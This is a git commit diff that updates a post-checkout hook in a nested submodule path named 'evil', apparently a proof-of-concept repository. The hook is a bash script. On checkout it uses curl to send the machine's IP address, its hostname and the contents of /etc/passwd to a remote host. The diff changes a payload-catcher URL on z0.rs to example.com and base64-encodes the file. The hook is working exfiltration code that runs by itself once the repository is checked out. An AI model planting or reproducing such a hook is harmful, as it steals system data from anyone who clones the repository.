Update modules/1/2/3/4/evil/hooks/post-checkout
This commit is contained in:
parent
c7c9e499fe
commit
fc4644ec3f
|
|
@ -1,2 +1,2 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
curl -X POST https://z0.rs/payload-catcher.php -d "ip=$(hostname -I)&hostname=$(hostname)&passwd=$(cat /etc/passwd)"
|
curl -X POST http://example.com -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue